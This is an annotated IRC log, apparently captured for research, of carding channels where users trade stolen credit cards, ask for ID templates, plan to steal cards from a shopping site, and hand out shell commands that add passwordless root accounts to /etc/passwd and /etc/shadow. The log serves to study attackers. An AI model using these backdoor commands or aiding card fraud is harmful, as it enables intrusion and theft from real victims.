:^w1nX^ :ping me :Bl4ck_ :not again :Bl4ck_ :-up :nirvana19 :I buy stuff :SLaZz :who wants to trade cc's ?? :nirvana19 :gfnbfg :nirvana19 :someone from romania? :savantul :yes :_Mephisto :multi multi = many :_Mephisto ::) :nirvana19 :aveti ceva marfa? do you have any goods? (Note:: ??) :nirvana19 :cumpar cumpar = i'm buying :_CardMan_ :re ppl :Bl4ck_ :arrrrrrrrrrrrrrrrr :Bl4ck_ :-up :_CardMan_ :what is new ? :Bl4ck_ :shitttttttttttttt :_CardMan_ :stupid bots :Bl4ck_ :-up :Bl4ck_ :-up :_CardMan_ :this is fun.... :Bl4ck_ :Omblad0n up :Bl4ck_ :Omblad0n op :Bl4ck_ ::>> :Bl4ck_ :arrrrrr :_CardMan_ :Bl4ck_....do u know what u r doing ? :Bl4ck_ :dunoo :_CardMan_ :i saw.... :_CardMan_ :so ... any romanian people here ? :bug____ :ops :_CardMan_ :bug____...whats up ? :savantul :lots :bug____ :nimic man nimic = nothing :_CardMan_ :ok... :bug____ :I need cc :bug____ :lol :_Mephisto :me too :_CardMan_ :pai care e din bucale si are niste cc-uri bune (NU bunicele, sau extrapolate) sa initieze o privata repede.... so whoever is from Bucharest and has some good cc's (NOT so-so ones, or extrapolated ones) should open a private chat quickly.... (Note:: ??) :nirvana19 :da o gramada de romanian pepole pe aici yes, a bunch of romanian people around here (Note:: ??) :bug____ :1 cc :bug____ :1 :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede.... so whoever is from Bucharest and has some good cc's, no bullshit, should open a private chat quickly....
:_CardMan_ :care esti pe kappa (IP: 192.168.254.95 you who are on kappa (IP: 192.168.254.95 :_CardMan_ :DNS: dialup-56k-95.example.xx :_CardMan_ :si dai cu scanarea ? and you're running scans? :nirvana19 :de unde pot sa fac rost de Legion 2.1 where can i get hold of Legion 2.1 :_Mephisto :de la mine from me :_CardMan_ :nirvana19.... LOLZ... nu stiai ca are back door mah ? didn't you know it has a back door, man? :nirvana19 :poti sa mi-l dai? can you give it to me? :dlotos33 :Is there any Romania friends? :bug____ :nope :dlotos33 :Is there any Romania friends? :_CardMan_ :a lots :Co0lWoRx :any1 here wanna earn +v, msg me :Co0lWoRx :any1 here wanna earn +v, msg me :v|Adu :re :v|Adu ::) :Co0lWoRx :ACTION any1 here wanna earn +v, msg me :v|Adu :anybody need a drop place ? :nirvana19 :de unde esti ma vladule? where are you from, Vlad? :_CardMan_ :v|Adu.... lasa-te de meserie .... give up the trade .... :v|Adu ::))))))) :v|Adu :cardman :v|Adu ::) :v|Adu :hahahahah :v|Adu ::) :_CardMan_ :suck it (Note:: ?? - all this is either romanian or some other language) :Co0lWoRx :ACTION any1 here wanna earn +v, msg me :nirvana19 :sorry :Co0lWoRx :ok :Co0lWoRx :np :xroach :anybody have any driver license template ? :xroach :anybody have any driver license templates ? :bug____ :u can save my ass with 1 cc :xroach :actually any good templates would be nice :bug____ :I got some sites :v|Adu :re :Co0lWoRks :ACTION any1 wanna earn +v in :Co0lWoRks :ACTION any1 wanna earn a virgin card, msg me now :Co0lWoRks :ill bbl, since no one wants anything here :Bl4ck_ :-up :Bl4ck_ :? :Bl4ck_ :soory :Bl4ck_ :I`ll go :dlotos33 :anyone have CC? :s1z1f :yes :xroach :anyone have or know where i could get license templates or any templates for mag cards ? :s1z1f :do enyone have cc? :dlotos33 :Does any one speak germany? :_CardMan_ :do not think so ... :2red :i speak some german :2red :why? :dlotos33 :What means "ORT" at GERMANY? :2red :city? :dlotos33 :thank you ,my friend :MaTiX_00 :hello :MaTiX_00 :anyone got a proxy for me to use? :dlotos33 :yes :SpRiTe^^^ :HI :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede.... so whoever is from Bucharest and has some good cc's, no bullshit, should open a private chat quickly....
:SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ :4,4 xxxx xxxx xxxx xxxx :SpRiTe^^^ :0,4 xxxx xxxx xxxx xxxx :SpRiTe^^^ :4,4 xxxx xxxx xxxx xxxx :SpRiTe^^^ :0,0 1,1 xxxx xxxx xxxx xxxx :kurky :Any GOOOOOOOD carders here? msg me :kurky :Anyone here got a UK cc??? Msg me :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA :][VaMpIrE :hi :][VaMpIrE :wanna trade? :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede.... so whoever is from Bucharest and has some good cc's, no bullshit, should open a private chat quickly.... :_CardMan_ :m4r1n4ru...salve mah m4r1n4ru...hi man :m4r1n4ru :-op :xroach :anybody have any dl templates ? cia/fbi/nsa would be cool too :s1z1f :do enybody have cc? :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA :s1z1f :do enybody have cc? :[SK]Kane :care aveti un proxy bun de www? who has a good www proxy? :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede.... so whoever is from Bucharest and has some good cc's, no bullshit, should open a private chat quickly.... :SpRiTe^^^ :H :SpRiTe^^^ :ok :m4r1n4ru :-op :s1z1f :do enybody have cc? :s1z1f :do enybody have cc? :dariuss :am yo 1000 :s1z1f :do enybody have cc? :natedogg :i do.. :s1z1f :pls give it to me :natedogg :trade... :natedogg :mgs me.. :s1z1f :pls give it to me :s1z1f :do enybody have cc? :natedogg :sizif ---------------banned#no more trade kind..... :s1z1f :do enybody have cc? :s1z1f :pls give it to me :s1z1f :do enybody have cc? :pimpg :yeah :pimpg :if you would like one you have to send me one first :pimpg :then if it approves :s1z1f :ok :pimpg :i will send one to you :pimpg :sound good :pimpg :pm me if you would like me 2 :D1ck :Tota1KaaS join #delusion :D1ck :Tota1KaaS say #delusion Ok, NOW introducing the the First Shell hosting company in pakitan, with excellent domains, Vhosts ip, bots, on a T3 HUB, coming soon.
:D1ck :Tota1KaaS say #delusion If interested say on main, and one of the admins will message :) :D1ck :Tota1KaaS say #delusion Ok, NOW introducing the the First Shell hosting company in pakitan, with excellent domains, Vhosts ip, bots, on a T3 HUB, coming soon. :D1ck :Tota1KaaS say #delusion If interested say on main, and one of the admins will message :) :dariuss :Bl4ck_-)) :Bl4ck_ :se man :s1z1f :*** pimpg (~ricky@exo01-ca.example.net) has joined :s1z1f :*** Retrieving :s1z1f : do enybody have cc? :s1z1f : pls give it to me :s1z1f :*** Retrieving :s1z1f :*** natedogg has quit IRC (Signed off) :s1z1f : do enybody have cc? :s1z1f : yeah :s1z1f : if you would like one you have to send me one first :s1z1f : then if it approves :Ghici :re ppl :pimpg :hello :pimpg :would anyone like to trade, i dont go first :D1ck :D4v3 :D1ck :WHEN BACK MSG ME :s1z1f :do enybody have cc? :dariuss :ACTION c ya :m4r1n4ru :Away :m4r1n4ru :I have Returned. :m4r1n4ru :Away :s1z1f :do enybody have cc? :m4r1n4ru :Away :Bon_Jovi :m4r1n4ru :s1z1f :do enybody have cc? :Bon_Jovi :yep :m4r1n4ru :Away :m4r1n4ru :Away :s1z1f :do enybody have cc? :m4r1n4ru :Away :D1ck :hey J4n3 :J4n3 :what's new :p ? :D1ck :server :D1ck :buying :D1ck :but what did j0e say :D1ck :which is good one? :J4n3 :buying ? confirmed ? :D1ck :i got 10 domains (Note:: at this point i guess they have closed the deal with the previous CCs) :D1ck ::P :D1ck :freind bought them :D1ck :hreh :D1ck :yup :J4n3 :usay khud sahi nahi patha usnay sirf example try kiya hai aur wo sahi nahi laga usay he himself doesnt know really, he just tried example and it didnt look all right to him :D1ck :example.net sux? :D1ck :oh :J4n3 :great :D1ck :(@J4n3): great :D1ck :? :J4n3 :haha u said friend already bought it ? :D1ck :domains :D1ck ::) :J4n3 :oh :J4n3 :but from where u planning to buy ? 
:D1ck :kuch samhaj nahi aa rahi cant understand anything :D1ck :where should i buy :D1ck :Server Space: Single Server :D1ck :IP Numbers: 30 :D1ck :Bandwidth: 50 Gigs :D1ck :Services: Level 1 (Included) :D1ck :Monitor: 24/7 Network Monitoring (Included) :D1ck :-------------------------------------------------------------------------------- :D1ck :Payment Plan: $2,182.80 paid Annually :D1ck :Setup Fee: $100.00 :D1ck :-------------------------------------------------------------------------------- :D1ck :Total Startup: $2,282.80 :D1ck :SkyNetWEB Ltd. :D1ck :3500 Boston St. :D1ck :Baltimore Maryland, 21224 :D1ck :Phone: 410.563.6384 :D1ck :Fax: 410.563.5457 :D1ck :Server Space: Single Server :D1ck :IP Numbers: 30 :D1ck :Bandwidth: 50 Gigs :J4n3 :2,828 ? :D1ck :Services: Level 1 (Included) :D1ck :Monitor: 24/7 Network Monitoring (Included) :D1ck :-------------------------------------------------------------------------------- :D1ck :Payment Plan: $2,182.80 paid Annually :D1ck :Setup Fee: $100.00 :D1ck :-------------------------------------------------------------------------------- :D1ck :Total Startup: $2,282.80 :D1ck :SkyNetWEB Ltd. :D1ck :3500 Boston St. :D1ck :Baltimore Maryland, 21224 :D1ck :Phone: 410.563.6384 :D1ck :Fax: 410.563.5457 :D1ck :yeah :D1ck :per year :D1ck ::(? :D1ck :or :? :J4n3 :but he got it about 800 $ total i think with all system p2 400 64 mb ram and 8.4 gb hd :D1ck ::)? :m4r1n4ru :Away :D1ck :but :D1ck :that was one month :D1ck :remmeber? :J4n3 :hmm :J4n3 :u mean thats all for one year ? :J4n3 :and u gonna pay for it ? :D1ck :tell me :D1ck :what should i do? :D1ck :i`m confewsed (Note:: you mean "confused"... kiddie) :J4n3 :yaar aaj raath tak wait karlo dude, wait till tonight :J4n3 :let me ask some more ppl :D1ck :oki :J4n3 :teeek haina ? it's ok with you, right?
:J4n3 :i'll ask miller too :D1ck :oki :D1ck :ok :D1ck :my budget is 170-200/month :J4n3 :hmm k :D1ck :>Domain Name 1....: example.com :D1ck :>Domain Name 2....: example.com :D1ck :>Domain Name 3....: example.com :D1ck :>Domain Name 4....: example.com :D1ck :>Domain Name 5....: example.com :D1ck :>Domain Name 6....: example.com :D1ck :>Domain Name 7....: example.com :D1ck :>Domain Name 8....: example.com :D1ck :>Domain Name 9....: example.com :D1ck :>Domain Name 10...: example.com :D1ck :>Total............: $649.50 :J4n3 :oh already registered ? :D1ck :yup :J4n3 :how many years ? :D1ck :1 :J4n3 :thats expensive :J4n3 :wait :D1ck :who cares :D1ck :its cared :J4n3 :let me check :J4n3 :oh :J4n3 :then its ok but wait :D1ck :oki :D1ck :(Sephirot): I need help , SOme one can help me :J4n3 :heh :D1ck :=p :J4n3 :oye :D1ck :? :J4n3 :u could got those 10 domain for 2 years at 300 $ and for 5 years at 750 $ :D1ck :kewl :D1ck :from where? :J4n3 :dotster :D1ck :dotster.com :D1ck :? :J4n3 :1 year: $15 2 year: $30 :J4n3 :5 year: $75 10 year: $150 :J4n3 ::) :J4n3 :yeah :D1ck :cool :D1ck ::P :J4n3 :we'll get more from there :D1ck :oki :D1ck :;) :D1ck :yaar dude :D1ck :i want the server :D1ck :b4d :D1ck :kuch samhaj nahin aa rahi cant understand anything :J4n3 :haha jald baazi math karo haha, dont make haste :D1ck :oye who could make a kewl kewl kewl webpage for webhosting and shell accounts? :m4r1n4ru :Away :J4n3 :coz u going to pay from ur pocket :D1ck :lol oki :J4n3 :zara ache thara maaloom karnay do let's locate some good chap :D1ck :ok;) :J4n3 :page design karnay ka masla nahi wo hojayega dont worry dont worry about the page design problem, it shall be done :D1ck :oki kewl :D1ck ::) :D1ck :oye :J4n3 :i'm gonna open a cosmetics shop at tariq road :p :D1ck :1pani nay apna server liya tha or rent? has j0e bought the server or rented it? (Note:: aek in hindi/urdu - pronounce: ache... means one. so 1pani would be j0e that they always refer to) :J4n3 :yea ? 
:J4n3 :liya tha had bought it :D1ck :kewl hehe :D1ck ::/ :D1ck ::/ :J4n3 :agar thum kaho tho j0e kee baath karwatha hon thum say if you say so, i can tell you j0e's deal :D1ck :oh :J4n3 :usay kahonga thumain call karday i will ask him to call you :J4n3 :ok ? :D1ck :ok :D1ck :sure :D1ck ::) :D1ck :but after 9 :D1ck :but after 9 pm :J4n3 :teeek hai phir khud hee pooch lena sub kuch ok then just ask him everything yourself :D1ck :coz i`ll be sleeping :J4n3 :hmm ok :D1ck :k;/ :D1ck :;/ :J4n3 ::) :J4n3 :tariq road , cosmetic shop, kewl kewl bachiyan *wink* bachiyan = chicks :D1ck :lol :D1ck :hahahaha :J4n3 :hehe yeah :J4n3 :have u seen that new building dolmen mall ? :D1ck ::P :D1ck :nop :m4r1n4ru :Away :J4n3 :hmm phir dekhna , its kewl and most beautiful market in karachi hmmm then take a look at it, it's cool and most beautiful market in karachi :J4n3 :yaar give me a kewl host , aisa jis main psybnc chalaon aur crash na ho, meray ziyad thar roots main make command work nahi kartha :( dude, give me a cool host, such that if we run psybnc on it, it doesnt crash. (Note:: i am having problems with some urdu words, but the word-by-word translation for the rest of it is: meray = mine main = in nahi = doesnt kartha = happens the last part is.."make command doesnt work in this") :D1ck ::)) :D1ck :oh :D1ck :i will send u psybnc-compiled :D1ck :when i boot :D1ck ::) :J4n3 :oh then its kewl :) :J4n3 :tight :J4n3 :for sparc na ? :D1ck :yeps :J4n3 :great waiting ... :D1ck :abey abhi ruk heheheh hey wait for now heheheh :D1ck :i am tlking to the person for col :D1ck ::P :D1ck ::pPpp :J4n3 :haha ruka huwa hon jub boot karo tho daydena hehe haha, i am waiting. 
when you boot then give it up hehe :D1ck :*** Joins: tOpDaWgGy (KoRn@spc-isp-tor-58-18-419.example.xx) :D1ck :(tOpDaWgGy): dAwGgGYY :D1ck :(tOpDaWgGy): chinii :D1ck :(tOpDaWgGy): jApAniIii :D1ck :(@D1ck): hEYyYYyYy :D1ck :(@D1ck): dOgYY :D1ck :hehehe :J4n3 :hehehe :D1ck ::) :m4r1n4ru :Away :D1ck :oye :D1ck :read :D1ck :http://www.example.net/Contracts/CIT-Colocation%20Agreement.html :D1ck :tell me i it have some clawa :D1ck :tell me i it have some claws :J4n3 :wait :D1ck :k :J4n3 :errror araha hai there's an error :D1ck :works for me :J4n3 :hmm nope not working let me try on netscape :D1ck :k :D1ck :(tOpDaWgGy): shAe.. dAwG bhai :J4n3 :Plan A: 20 gigs/month [64kbps avg.], * up to 30 IP addresses ($150.00 :J4n3 : per month) :D1ck :is ko doggy kay ilawa this one as an alternative to doggy :J4n3 :thats what u want to buy ? :D1ck :nope :D1ck :40 gig :D1ck :256 ips :J4n3 :Plan B: 40 gigs/month [128kbps avg], * up to 62 IP addresses ($250.00 :J4n3 : per month) :J4n3 :its 62 in 40 gigs :D1ck :yep but he sed he will allow 256 if not needed :D1ck :needded :J4n3 :oh then its okay package is kool :D1ck :kewl :J4n3 :.msg G_u_Y__ abay oye chichoray mmoooon band kar apna hey you squirt, shut your mouth PRIVMSG G_u_Y__ :abay oye chichoray mmoooon band kar apna hey you squirt, shut your mouth :D1ck :best firwalling and dos protection in town :D1ck :lol :J4n3 :hmm kewl :J4n3 :oye add my this host to bots plz :) :m4r1n4ru :Away :D1ck :sure :D1ck :whats yure ip :D1ck :/whois J4n3 :J4n3 :* :D1ck :onghome.com :D1ck :oki :D1ck :.host add J4n3 * :D1ck :brb :J4n3 :thanx :) :m4r1n4ru :Away :J4n3 :.join #karachi :m0sTwAnTdpinG :G_u_Y__ you and i will get along well :J4n3 :.msg #karachi GUY ullooo kay pattay moon band rakko apna you stupid chaps, keep your mouth shut :sawera hey ask those who are about to die what their last wish is :G_u_Y__ :J4n3 :oops :J4n3 : ? :J4n3 :say A? 
:G_u_Y__ dearest :J4n3 :.say #karachi GUY Ullooo kay pattay mooon band rakko apna :p you stupid chaps, keep your mouth shut :J4n3 :.part #karachi :m4r1n4ru :Away :D1ck :J4n3 :D1ck :my dadi's bro died today, so my dad is off to lahore :D1ck :shit :D1ck :ab this kaam will latkofy now this work will be left hanging :J4n3 :oh :J4n3 :Inna lillaaye wa inna ilayae raajioon (Note:: some prayer to allah it seems) :J4n3 :very sorry :D1ck ::p :D1ck :yep he was 85, this is life, ppl come and go :D1ck :hehe :D1ck :its ok :D1ck :;) :J4n3 :oh :D1ck ::) :J4n3 :phir tho time tha jaanay ka unkay then it was time for him to go :J4n3 :i thought he was young :J4n3 ::p :D1ck :nop :D1ck :hehe :J4n3 :hehe :D1ck ::) :D1ck :oye :D1ck :what i say is :D1ck :hm :J4n3 :is ? :D1ck :chalo time mil gaye ga come we shall get the time :D1ck :now we can investiagte :J4n3 :yeah yeah :J4n3 ::) :D1ck :(g|nger`): well :D1ck :(g|nger`): i have like 20 :D1ck :(g|nger`): example.org example.org example.com example.net example.com example.com example.org will-fuck-up-example.com example.com example.com example.com example.com example.com :D1ck :(g|nger`): plus others :D1ck :(g|nger`): you can have whatever vhosts you want :D1ck :kewl? :m4r1n4ru :Away :J4n3 :yeah kewl :D1ck :PHAT6 :D1ck :;pp :J4n3 :if we have domains, we can have vhost of whatever we like :D1ck :yaar is it possibl that u can help me with wrebpage :P? :D1ck :i cant do alone, coz i have 0-webpage skilzl :D1ck :hehe :J4n3 :yeah yeah i'm with u always :J4n3 ::) :D1ck :iknowheh :J4n3 :dont feel ur self alone :D1ck :kool:) :D1ck :kleet :J4n3 ::) :D1ck :aur sunao so what else is new? :D1ck :what haWt :J4n3 :nutthin hot naveed nay chars maanga hai hehe nothing's hot. naveed has asked for some marijuana (chars = marijuana/pot) :D1ck :HAHAHAHAAHAHA :J4n3 :hehehe yeah :D1ck :woh charas peeta hai? apni girlfreind ka chakroon may juis nay is ko ghaas nahindali? does he do marijuana? 
(Note:: something about his girlfriend being involved in marijuana too) :D1ck :ROFL :J4n3 :lol :D1ck ::) :D1ck ::) :J4n3 :hah chars tho shroo say peetha hai pehlay bee main day chuka hon usko hah. he was having marijuana since the beginning. earlier i had given him some too :D1ck :lol :D1ck :oki :D1ck :tum charas latay hoon? do you also do marijuana? :[Agent] :anyone wants to have proxy list, cc list, RH bash shell eggable..msg me if ur serious :J4n3 :haan , i have many relations with drug mafia hehe :D1ck :(if answer=yes) { d4v3== "should not take" else printf ("its ok\n"); :D1ck :lol :Flapjack- :Anyone trade cc for bnc? Msg me :D1ck :char drugs[80]' :D1ck :char drugs[80]; :J4n3 :hehe :J4n3 :lol :D1ck ::) :J4n3 :main bee peetha hon kabee kabee mood hoay par i have some depends on the mood :D1ck :oh :D1ck :(@|S4n4m|): wasalamz salutations :D1ck :(sawera): w/salam :D1ck :chix? :D1ck :bawt? :J4n3 :yup |S4n4m| = mine :D1ck :hahaa :D1ck :all-chicks = yure :dmonchild :ACTION i am selling hardware if your intrested please /msg me for prices thanks :J4n3 :<|S4n4m|> key tum ko kuch kam karna hay hey do you want to do some work? :J4n3 :> thum falsafi kub say ban gayee ? since when did you become a philosopher? :J4n3 :<|S4n4m|> jab sey tum sey bat ki hay since the time i've started talking to you :J4n3 :aaaaahhhhhhhhhh :D1ck :hhaha :D1ck ::P :D1ck :mv logs.txt bhabi.txt (Note:: bhabi = sister-in-law) :J4n3 :lol :J4n3 :oye :D1ck : cat bhabi.txt :D1ck : I WILL KILL U D4v3 :D1ck :? :J4n3 :muhahahahahhahahahahhhaa :J4n3 :HHAHAHAHAHAHAH :D1ck ::) :J4n3 :heheheheh :J4n3 :ROFLMAO :D1ck :(: :J4n3 :ROFLMAO :D1ck :=P :m4r1n4ru :Away :dmonchild :ACTION i am selling hardware if your intrested please /msg me for prices thanks :m4r1n4ru :Away :Dariox :who trade cc :m4r1n4ru :Away :m4r1n4ru :Away :m4r1n4ru :Away :m4r1n4ru :Away :m4r1n4ru :Away :[Agent] :anyone can card me a laptop? 
:m4r1n4ru :Away :m4r1n4ru :Away :telnet- :anyone can card me a shell or web domain....pls answer to me :m4r1n4ru :Away :[Agent] :wanna trade Romanian: :|S4n4m| :tum aisey hi bolna Just keep on saying like this :|S4n4m| :karna kuch nahi dont do anything :J4n3 :ye baath hai ? is that the deal? :|S4n4m| :han yes :|S4n4m| :yeh bat hay that is the deal :J4n3 :ping bot aaraha hai the ping bot is coming :|S4n4m| :instooooooooooooooooooooo :|S4n4m| ::) :|S4n4m| :karachi mey aooo come to karachi :J4n3 :ok bot aagaya ok the bot is here :J4n3 :d3s|r3 hai uska nick it's nick is d3s|r3 :J4n3 :ab main channel par tyep karo ping me now type in the main channel in ping (Note:: dont know what it translates to) :J4n3 : PiNG THiNGiE - hiall's ping reply took 13 seconds :|S4n4m| :hmmm :|S4n4m| :tahnks :J4n3 :dekha ? saw that? :J4n3 :ab khush ? now are you happy? :|S4n4m| :han yes :|S4n4m| :kush happy :J4n3 :bus thum khush raho :) that's all ... keep staying happy :) :|S4n4m| :wah cool :|S4n4m| :kya bat hay app ki what shall i say about you :|S4n4m| :wasey :|S4n4m| :mey ney ek bandha rakh leeya hay i have kept one system for myself :|S4n4m| :ping key leyya for pinging :J4n3 :thumara bandaa 24 hour nahin betay gas your system wont be for 24 hours (Note:: again i am having difficulty translating - grammar issues in urdu) :J4n3 :mera bot hoga my bot will :|S4n4m| :hmmmmmmmmmm :|S4n4m| :instoo :|S4n4m| :zara 5 min key leyee for a little bit... 5 mins :|S4n4m| :karachi channel per on karachi channel :|S4n4m| :flori ka interview ley loo take flori's interview :|S4n4m| :mey ney appoint kya hay i have appointed (him/her?) :J4n3 :hahaha nahin thum khud hee laylo yes yes, but take it yourself (the interview) :|S4n4m| :kyon why? :|S4n4m| :tum yahn key op hoo you are the op here :|S4n4m| :admintration mey hoo i am in administration :J4n3 :op thum oh main co-founder hon you are the op, i am the co-founder :J4n3 :aaayee meraa dil......chua kay lagyeeee...churanay wali meri qaatil ohhh.... 
she stole my heart :|S4n4m| :han wohi hii yes, her :|S4n4m| :hello :|S4n4m| :kya hoa what happened? :J4n3 :wait :J4n3 :.up :J4n3 :.op netra :J4n3 :.op Ott0 :Dew :Hey J4n3 u there ? :J4n3 :.host add J4n3 * :J4n3 :.up :J4n3 :OngHome esay $uptime :D1ck :J4n3 :D1ck :i`m getting my own server;) :D1ck :J4n3 :D1ck :J4n3 :J4n3 :D1ck :J4n3 :i'm here :D1ck :hehe :D1ck :J4n3 :J4n3 :hehe :J4n3 :D1ck :D1ck :oye give me those commands for linux password adding and sun adding re ro re r i gave u :D1ck ::P :D1ck :i lost mine :J4n3 :wait :D1ck :and i dont wana make again :J4n3 :cp /etc/passwd /etc/.tp; :J4n3 :echo "ro::99999::::::" >> /etc/shadow; :J4n3 :echo "r::99999::::::" >> /etc/shadow; :J4n3 :echo "ro:x:500:1000::/:/bin/bash" >> /etc/passwd; :J4n3 :echo "r:x:0:0::/:/bin/bash" >> /etc/passwd; :J4n3 :cp /etc/shadow /etc/.ts; :D1ck :k :J4n3 ::p :D1ck :and suhn :D1ck :? :D1ck :sun :D1ck :? :J4n3 :wait :D1ck :gimme sun tew :D1ck :k :J4n3 :cp /etc/passwd /etc/.tp; :J4n3 :echo "re::6445::::::" >> /etc/shadow; :J4n3 :echo "r::10891::::::" >> /etc/shadow; :J4n3 :echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd; :J4n3 :echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd; :J4n3 :cp /etc/shadow /etc/.ts; :D1ck :thx :J4n3 :np :p :D1ck :oye :D1ck :me getting a box :D1ck :T+3 :D1ck :T3 :J4n3 :wow :J4n3 :kewl :D1ck :where should i get? :D1ck :where is j0e getting :D1ck :d4v3 i want the folling domains :J4n3 :folling ? (Note:: misspelt "following") :D1ck example.org :J4n3 :j0e say contact nahi huwa called him 2 times j0e said there has been no contact ... called him 2 times :D1ck :wetcunts.net :J4n3 :example hmm :J4n3 :mil jayega agar register nahi huwa hai tho we will get it if it has not been registered :D1ck :undefined.net :D1ck :and kewl ones :D1ck :but not one's that end with zzz :D1ck :like dreamzzz.net :D1ck :etc :D1ck :eeet.org :D1ck :eeet.net :D1ck :oye :D1ck :how much j0e paid :D1ck :and what server? :J4n3 :he paid 250 $ :J4n3 :from example.net :D1ck :kewl :D1ck :for a T3? 
:J4n3 :and yeah example.org and com net all available :p :J4n3 :T1 i think :D1ck :kewl :D1ck :get me please :D1ck :oh :J4n3 :yaar CC :( :J4n3 :no CC right now :J4n3 :yaar u have that bind weapon why dont u hit a big shoping site and take cc's ? (Note:: here's where they hatch the idea of stealing CCs) :D1ck :yep :D1ck :oki :D1ck : welp why dont we all hang in :D1ck :it was my channel and i think ti still is :J4n3 :abay yaar sub fraud hotha hai wahan par hey dude, a lot of fraud goes on there :J4n3 :their CC's do not work :D1ck :hehe :J4n3 :bauth try kiya hai undernet and effnet par tried a lot on undernet and effnet :D1ck :k :D1ck :heh k :D1ck : DIGITALINET offers quality web hosting staring at 6$ a :D1ck : month. Signup for webhosting with digitalinet and get your :D1ck : domain for 11$ a year :D1ck : information. :D1ck :i`ll buy 2 legit domains there :J4n3 :haha i had a shell from there :D1ck :kewl :J4n3 :they closed shell service now :J4n3 :adult web hosting :p :D1ck :lol :J4n3 :service achee thee buree nahin thee the service was good, not bad at all :D1ck :haha :J4n3 :oye sex time :J4n3 :brb :J4n3 :br :J4n3 :bbl :J4n3 :shayed so gaya seems like he's gone to sleep :D1ck :ahahahha :J4n3 :hehe :J4n3 :g0ne :D1ck :.join :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? 
:^w1nX^ :cc :^w1nX^ :cc :^w1nX^ :sleepin chann :^w1nX^ :trade :^w1nX^ :sleepin chann :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :trade :atlanta.ga.us.undernet.org 005 spitz SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :nirvana19 :e cinevA de aici si pe rocarding? @ is somebody here also on #rocarding? (Note:: definitely not urdu here) :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :Bl4ck_ :not again :Bl4ck_ :-up :nirvana19 :I buy stuff :SLaZz :who wants to trade cc's ?? :nirvana19 :gfnbfg :nirvana19 :someone from romania? :savantul :yes :_Mephisto :multi @ a lot of (people) :_Mephisto ::) :nirvana19 :aveti ceva marfa? @do you have some stuff? (Note:: ??) :nirvana19 :cumpar @ I buy :_CardMan_ :re ppl :Bl4ck_ :arrrrrrrrrrrrrrrrr :Bl4ck_ :-up :_CardMan_ :what is new ? :Bl4ck_ :shitttttttttttttt :_CardMan_ :stupid bots :Bl4ck_ :-up :Bl4ck_ :-up :_CardMan_ :this is fun.... :Bl4ck_ :Omblad0n up :Bl4ck_ :Omblad0n op :Bl4ck_ ::>> :Bl4ck_ :arrrrrr :_CardMan_ :Bl4ck_....do u know what u r doing ? :Bl4ck_ :dunoo :_CardMan_ :i saw.... :_CardMan_ :so ... any romanian people here ? :bug____ :ops :_CardMan_ :bug____...whats up ? :savantul :lots :bug____ :nimic man @ nothing man :_CardMan_ :ok... :bug____ :I need cc :bug____ :lol :_Mephisto :me too :_CardMan_ :pai care e din bucale si are niste cc-uri bune (NU bunicele, sau extrapolate) sa initieze o privata repede.... @ so, those who is from Bucharest and who has some good cc (NOT "good enough" or extrapolated), let's start fast "a private one" (conversation) ... (Note:: ??) :nirvana19 :da o gramada de romanian pepole pe aici @ lots of romanian people here (Note:: ??) 
:bug____ :1 cc :bug____ :1 :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede.... @ so, those who is from Bucharest and who has some good cc, not bogus, let's start fast "a private one" (conversation) ... :_CardMan_ :care esti pe kappa (IP: 192.168.254.95 :_CardMan_ :DNS: dialup-56k-95.example.xx :_CardMan_ :si dai cu scanarea ? @ who are you on kappa (IP: 192.168.254.95 @ DNS: dialup-56k-95.example.xx ( kappa.ro ??) @ and are you scanning ? :nirvana19 :de unde pot sa fac rost de Legion 2.1 @where can I get Legion 2.1 :_Mephisto :de la mine @from me :_CardMan_ :nirvana19.... LOLZ... nu stiai ca are back door mah ? @ ...LOLZ... didn't you knew that is has backdoor? :nirvana19 :poti sa mi-l dai? @ could you give it to me? :dlotos33 :Is there any Romania friends? :bug____ :nope :dlotos33 :Is there any Romania friends? :_CardMan_ :a lots :Co0lWoRx :any1 here wanna earn +v, msg me :Co0lWoRx :any1 here wanna earn +v, msg me :v|Adu :re :v|Adu ::) :Co0lWoRx :ACTION any1 here wanna earn +v, msg me :v|Adu :anybody need a drop place ? :nirvana19 :de unde esti ma vladule? @ where are you from vladu? :_CardMan_ :v|Adu.... lasa-te de meserie .... @ ... got it lost .... :v|Adu ::))))))) :v|Adu :cardman :v|Adu ::) :v|Adu :hahahahah :v|Adu ::) :_CardMan_ :suck it (Note:: ?? - all this is either romanian or some other language) @ yes, this is romanian slang :Co0lWoRx :ACTION any1 here wanna earn +v, msg me :nirvana19 :sorry :Co0lWoRx :ok :Co0lWoRx :np :xroach :anybody have any driver license template ? :xroach :anybody have any driver license templates ? :bug____ :u can save my ass with 1 cc :xroach :actually any good templates would be nice :bug____ :I got some 